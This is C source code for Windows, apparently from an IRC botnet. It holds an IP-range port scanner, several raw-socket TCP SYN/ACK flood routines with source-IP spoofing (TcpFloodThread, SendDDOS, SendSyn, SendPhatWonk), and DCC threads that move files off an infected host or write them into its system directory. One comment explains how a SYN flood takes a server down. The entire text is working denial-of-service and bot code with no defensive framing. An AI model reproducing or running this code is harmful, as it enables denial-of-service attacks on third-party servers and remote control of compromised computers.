// scan a range of IPs for an open port DWORD WINAPI ScanThread(LPVOID param) { DWORD id, host; HANDLE th; char str[128]; SCAN scan = *((SCAN *)param); SCAN *scans = (SCAN *)param; scans->gotinfo = TRUE; while(1) { sprintf(str, "nzm (portscan.plg) »» Scanning IP: %s, Port: %d.", finet_ntoa(scan.addy), scan.port); strncpy(threads[scan.threadnum].name, str, sizeof(threads[scan.threadnum].name)-1); if (th = CreateThread(NULL, 0, &ScanConnectThread, (LPVOID)&scan, 0, &id)) { while(scan.cgotinfo == FALSE) Sleep(50); } CloseHandle(th); scans->cgotinfo = FALSE; Sleep(scans->delay); memcpy(&host, &scan.addy, 4); host = fntohl(host); host += 1; host = fhtonl(host); memcpy(&scan.addy, &host, 4); } clearthread(scan.threadnum); return 0; }
unsigned long AdvGetNextIP(int threadnum) { DWORD host; memcpy(&host, &advinfo[threadnum].ip, 4); host = fntohl(host); host += 1; host = fhtonl(host); memcpy(&advinfo[threadnum].ip, &host, 4); return (advinfo[threadnum].ip); }
DWORD WINAPI TcpFloodThread(LPVOID param) { TCPFLOOD tcpflood = *((TCPFLOOD *)param); TCPFLOOD *tcpfloods = (TCPFLOOD *)param; tcpfloods->gotinfo = TRUE; char sendbuf[IRCLINE], szSendBuf[60]={0}; IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; srand(GetTickCount()); SOCKET ssock; if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) { sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } BOOL flag = TRUE; if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } if (finet_addr(tcpflood.ip) == INADDR_NONE) { sprintf(sendbuf,"[TCP]: Invalid target IP."); if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(0); ssin.sin_addr.s_addr=finet_addr(tcpflood.ip); int sent = 0; unsigned long start = GetTickCount(); while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) { ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock)))); ipHeader.destIP=ssin.sin_addr.s_addr; ((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port))); tcpHeader.sport=fhtons((unsigned short)(rand()%1025)); tcpHeader.seq=fhtonl(0x12345678); if (strstr(tcpflood.type,"syn")) { tcpHeader.ack_seq=0; tcpHeader.flags=SYN; } else if (strstr(tcpflood.type,"ack")) { tcpHeader.ack_seq=0; tcpHeader.flags=ACK; } else if (strstr(tcpflood.type,"random")) { tcpHeader.ack_seq=rand()%3; ((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK)); } tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.window=fhtons(512); tcpHeader.urg_ptr=0; tcpHeader.checksum=0; psdHeader.saddr=ipHeader.sourceIP; psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader))); memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { fclosesocket(ssock); _snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError()); if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); } sent++; } fclosesocket(ssock); sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024)); if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); addlog(sendbuf); clearthread(tcpflood.threadnum); ExitThread(0); }
long SendDDOS(unsigned long TargetIP, unsigned int SpoofingIP, char *Type, unsigned short TargetPort, int len) { WSADATA WSAData; SOCKET sock; SOCKADDR_IN addr_in; IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; LARGE_INTEGER freq, halt_time, cur; char szSendBuf[60]={0},buf[64]; int rect; if (fWSAStartup(MAKEWORD(2,2), &WSAData)!=0) return FALSE; if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) { fWSACleanup(); return FALSE; } BOOL flag=TRUE; if (fsetsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) { fclosesocket(sock); fWSACleanup(); return FALSE; } addr_in.sin_family=AF_INET; addr_in.sin_port=fhtons((unsigned short)TargetPort); addr_in.sin_addr.s_addr=TargetIP; ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.destIP=TargetIP; tcpHeader.dport=fhtons((unsigned short)TargetPort); tcpHeader.sport=fhtons((unsigned short)rand()%1025); tcpHeader.seq=fhtonl(0x12345678); /* A SYN attack simply smash its target up with TCP SYN packets. Each SYN packet needs a SYN-ACK response and forces the server to wait for the good ACK in reply. Of course, we just never gives the ACK, since we use a bad IP address (spoof) there's no chance of an ACK returning. This quickly kills a server as it tries to send out SYN-ACKs while waiting for ACKs. When the SYN-ACK queues fill up, the server can no longer take any incoming SYNs, and that's the end of that server until the attack is cleared up.*/ if (strcmp(Type,"ddos.syn") == 0) { tcpHeader.ack_seq=0; tcpHeader.flags=SYN; } else if (strcmp(Type,"ddos.ack") == 0) { tcpHeader.ack_seq=0; tcpHeader.flags=ACK; } else if (strcmp(Type,"ddos.random") == 0) { tcpHeader.ack_seq=rand()%3; if (rand()%2 == 0) tcpHeader.flags=SYN; else tcpHeader.flags=ACK; } tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.window=fhtons(16384); tcpHeader.urg_ptr=0; long total = 0; QueryPerformanceFrequency(&freq); QueryPerformanceCounter(&cur); halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart; while(TRUE) { tcpHeader.checksum=0; tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000)); tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand())); ipHeader.sourceIP=fhtonl(SpoofingIP++); psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons(sizeof(tcpHeader)); psdHeader.saddr=ipHeader.sourceIP; memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&addr_in, sizeof(addr_in)); if (rect==SOCKET_ERROR) { sprintf(buf, "[DDoS]: Send error: <%d>.",fWSAGetLastError()); addlog(buf); fclosesocket(sock); fWSACleanup(); return 0; } total += rect; QueryPerformanceCounter(&cur); if (cur.QuadPart >= halt_time.QuadPart) break; } fclosesocket(sock); fWSACleanup(); return (total); }
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len) { IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; LARGE_INTEGER freq, halt_time, cur; char szSendBuf[60]={0},buf[64]; int rect; WSADATA WSAData; if (fWSAStartup(MAKEWORD(2,2), &WSAData) != 0) return FALSE; SOCKET sock; if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) { fWSACleanup(); return FALSE; } BOOL flag=TRUE; if (fsetsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) { fclosesocket(sock); fWSACleanup(); return FALSE; } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(TargetPort); ssin.sin_addr.s_addr=TargetIP; ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); ipHeader.ident=1; ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_TCP; ipHeader.checksum=0; ipHeader.destIP=TargetIP; tcpHeader.dport=fhtons(TargetPort); tcpHeader.ack_seq=0; tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); tcpHeader.flags=2; tcpHeader.window=fhtons(16384); tcpHeader.urg_ptr=0; long total = 0; QueryPerformanceFrequency(&freq); QueryPerformanceCounter(&cur); halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart; while (1) { tcpHeader.checksum=0; tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000)); tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand())); ipHeader.sourceIP=fhtonl(SpoofingIP++); psdHeader.daddr=ipHeader.destIP; psdHeader.zero=0; psdHeader.proto=IPPROTO_TCP; psdHeader.length=fhtons(sizeof(tcpHeader)); psdHeader.saddr=ipHeader.sourceIP; memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin)); if (rect==SOCKET_ERROR) { sprintf(buf, "[SYN]: Send error: <%d>.",fWSAGetLastError()); addlog(buf); fclosesocket(sock); fWSACleanup(); return 0; } total += rect; QueryPerformanceCounter(&cur); if (cur.QuadPart >= halt_time.QuadPart) break; } fclosesocket(sock); fWSACleanup(); return (total); }
DWORD WINAPI DCCSendThread(LPVOID param) { DCC dcc = *((DCC *)param); DCC *dccs = (DCC *)param; dccs->gotinfo = TRUE; char sendbuf[IRCLINE],buffer[1024],tmpfile[MAX_PATH]; int Fsend, bytes_sent; unsigned int move; unsigned __int64 totalbytes = 0; DWORD mode = 0; SOCKET ssock; while (1) { if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) { sprintf(sendbuf,"[DCC]: Failed to create socket."); break; } SOCKADDR_IN csin, ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(0);//random port ssin.sin_addr.s_addr = INADDR_ANY; if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != 0) { sprintf(sendbuf,"[DCC]: Failed to bind to socket."); break; } int ssin_len = sizeof(ssin); fgetsockname(ssock, (LPSOCKADDR)&ssin, &ssin_len); unsigned short portnum = fntohs(ssin.sin_port); for (unsigned int i=0;i <= strlen(dcc.filename); i++) tmpfile[i] = ((dcc.filename[i] == 32)?(95):(dcc.filename[i])); if (flisten(ssock, 1) != 0) { sprintf(sendbuf,"[DCC]: Failed to open socket."); break; } HANDLE testfile = CreateFile(dcc.filename,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0); if (testfile == INVALID_HANDLE_VALUE) { sprintf(sendbuf,"[DCC]: File doesn't exist."); break; } int length = GetFileSize(testfile,NULL); sprintf(sendbuf,"DCC SEND %s %i %i %i",dcc.filename,fhtonl(finet_addr(GetIP(dcc.sock))),portnum,length); irc_privmsg(dcc.sock,dcc.sendto,sendbuf,FALSE); TIMEVAL timeout; timeout.tv_sec = 60;//timeout after 60 sec. timeout.tv_usec = 0; fd_set fd_struct; FD_ZERO(&fd_struct); FD_SET(ssock, &fd_struct); if (fselect(0, &fd_struct, NULL, NULL, &timeout) <= 0) { irc_privmsg(dcc.sock,dcc.sendto,"[DCC]: Send timeout.",dcc.notice); break; } int csin_len = sizeof(csin); if ((dcc.csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET) { sprintf(sendbuf,"[DCC]: Unable to open socket."); break; } fclosesocket(ssock); while (length) { Fsend = 1024; if (Fsend>length) Fsend=length; move = 0-length; memset(buffer,0,sizeof(buffer)); SetFilePointer(testfile, move, NULL, FILE_END); ReadFile(testfile, buffer, Fsend, &mode, NULL); bytes_sent = fsend(dcc.csock, buffer, Fsend, 0); totalbytes += bytes_sent; if (frecv(dcc.csock,buffer ,sizeof(buffer), 0) < 1 || bytes_sent < 1) { irc_privmsg(dcc.sock,dcc.sendto,"[DCC]: Socket error.",dcc.notice); addlog("[DCC]: Socket error."); fclosesocket(dcc.csock); clearthread(dcc.threadnum); ExitThread(1); } length = length - bytes_sent; } if (testfile != INVALID_HANDLE_VALUE) CloseHandle(testfile); sprintf(sendbuf,"[DCC]: Transfer complete to IP: %s, Filename: %s (%s bytes).",finet_ntoa(csin.sin_addr),dcc.filename,commaI64(totalbytes)); break; } if (!dcc.silent) irc_privmsg(dcc.sock,dcc.sendto,sendbuf,dcc.notice); addlog(sendbuf); if (ssock > 0) fclosesocket(ssock); fclosesocket(dcc.csock); clearthread(dcc.threadnum); ExitThread(0); }
DWORD WINAPI DCCGetThread(LPVOID param) { DCC dcc = *((DCC *)param); DCC *dccs = (DCC *)param; dccs->gotinfo = TRUE; char sendbuf[IRCLINE],buffer[4096],tmpfile[MAX_PATH];; int received = 0; unsigned long received2; FILE *infile; SOCKET ssock; GetSystemDirectory(tmpfile, sizeof(tmpfile)); sprintf(tmpfile,"%s%s",tmpfile,dcc.filename); while (1) { HANDLE testfile = CreateFile(tmpfile,GENERIC_WRITE,FILE_SHARE_READ,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); if (testfile == INVALID_HANDLE_VALUE) { sprintf(sendbuf,"[DCC]: Error unable to write file to disk."); break; } CloseHandle(testfile); if ((infile = fopen(tmpfile,"a+b")) == NULL) { sprintf(sendbuf,"[DCC]: Error opening file for writing."); break; } if ((ssock = CreateSock(dcc.host,dcc.port)) == INVALID_SOCKET) { sprintf(sendbuf,"[DCC]: Error opening socket."); break; } DWORD err = 1; while (err != 0) { memset(buffer,0,sizeof(buffer)); err = frecv(ssock, buffer, sizeof(buffer), 0); if (err == 0) break; if (err == SOCKET_ERROR) { sprintf(sendbuf,"[DCC]: Socket error."); irc_privmsg(dcc.sock,dcc.sendto,sendbuf,dcc.notice); addlog(sendbuf); fclose(infile); fclosesocket(ssock); clearthread(dcc.threadnum); ExitThread(1); } fwrite(buffer,1,err,infile); received = received + err; received2 = fhtonl(received); fsend(ssock,(char *)&received2 , 4, 0); } sprintf(sendbuf,"[DCC]: Transfer complete from IP: %s, Filename: %s (%s bytes).",dcc.host,dcc.filename,commaI64(received)); break; } if (!dcc.silent) irc_privmsg(dcc.sock,dcc.sendto,sendbuf,dcc.notice); addlog(sendbuf); if (infile != NULL) fclose(infile); if (ssock > 0) fclosesocket(ssock); clearthread(dcc.threadnum); ExitThread(0); }
char* SendPhatWonk(unsigned long TargetIP, unsigned int len, int delay) { BOOL flag=TRUE; unsigned long lTimerCount=0; struct timespec ts; int i=0; struct sockaddr_in addr; int scansock=0; sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED); fsetsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char*)&flag, sizeof(flag)); srand(GetTickCount()); unsigned int port[28] = { 1025,21,22,23,25,53,80,81,88,110,113,119,135, 137,139,143,443,445,1024,1433,1500, 1720,3306,3389,5000,6667,8000,8080 }; unsigned int openport[28] = {0,0,0}; static char hitports[1024] = ""; int hitport=0, lastport=0; char tmpMess[]=""; struct timeval working_timeout; working_timeout.tv_sec = 3; working_timeout.tv_usec = 3000; for (i=0;i<28;i++) { addr.sin_family = AF_INET; addr.sin_addr.s_addr = TargetIP; addr.sin_port = fhtons(port[i]); scansock = fsocket(AF_INET,SOCK_STREAM,0); int result = connect_no_timeout(scansock,(struct sockaddr *)&addr,sizeof(struct sockaddr),&working_timeout); fclosesocket(scansock); if(result == 0) { openport[i] = port[i]; } } sprintf(hitports, " "); lTimerCount=GetTickCount(); for (i=0;i<28;i++) { if ((GetTickCount()-lTimerCount)/1000>len) break; if (openport[i] != 0) { hitport = openport[i]; //hitports.Format("%s%d ",hitports.CStr(),hitport); sprintf(hitports, "%s%d ", hitports, hitport); } else { hitport = fhtons (brandom (0, 65535)); // no open ports } } for (;;) { memset(&packet, 0, sizeof(packet)); ts.tv_sec = 0; ts.tv_nsec = 10; packet.ip.ihl = 5; packet.ip.ver = 4; packet.ip.pro = IPPROTO_TCP; packet.ip.tos = 0x08; packet.ip.id = fhtons (brandom (1024, 65535)); packet.ip.tl = fhtons(sizeof(packet)); packet.ip.off = 0; packet.ip.ttl = 255; if (!spoofing) packet.ip.src = spoofip(TargetIP); else packet.ip.src = finet_addr(spoof); packet.ip.dst = TargetIP; packet.tcp.flg = 0; packet.tcp.win = fhtons(16384); packet.tcp.seq = fhtonl (brandom (0, 65535) + (brandom (0, 65535) << 8)); packet.tcp.ack = 0; packet.tcp.off = 5; packet.tcp.urp = 0; packet.tcp.dst = hitport; cksum.pseudo.daddr = TargetIP; cksum.pseudo.mbz = 0; cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = fhtons(sizeof(struct xtcphdr)); s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = TargetIP; s_in.sin_port = packet.tcp.dst; for(i=0;i<1023;++i) { /* send 1 syn packet + 1023 ACK packets. */ if(i==0) { packet.tcp.src = fhtons (brandom (0, 65535)); cksum.pseudo.saddr = packet.ip.src; packet.tcp.flg = SYN; packet.tcp.ack = 0; } else { packet.tcp.flg = ACK; packet.tcp.ack = fhtons (brandom (0, 65535)); } ++packet.ip.id; ++packet.tcp.seq; s_in.sin_port = packet.tcp.dst; packet.ip.sum = 0; packet.tcp.sum = 0; cksum.tcp = packet.tcp; packet.ip.sum = checksum((unsigned short *)&packet.ip, 20); packet.tcp.sum = checksum((unsigned short *)&cksum, sizeof(cksum)); fsendto(sock, (const char *)&packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)); } if((GetTickCount()-lTimerCount)/1000>len) break; Sleep(delay); } return hitports; }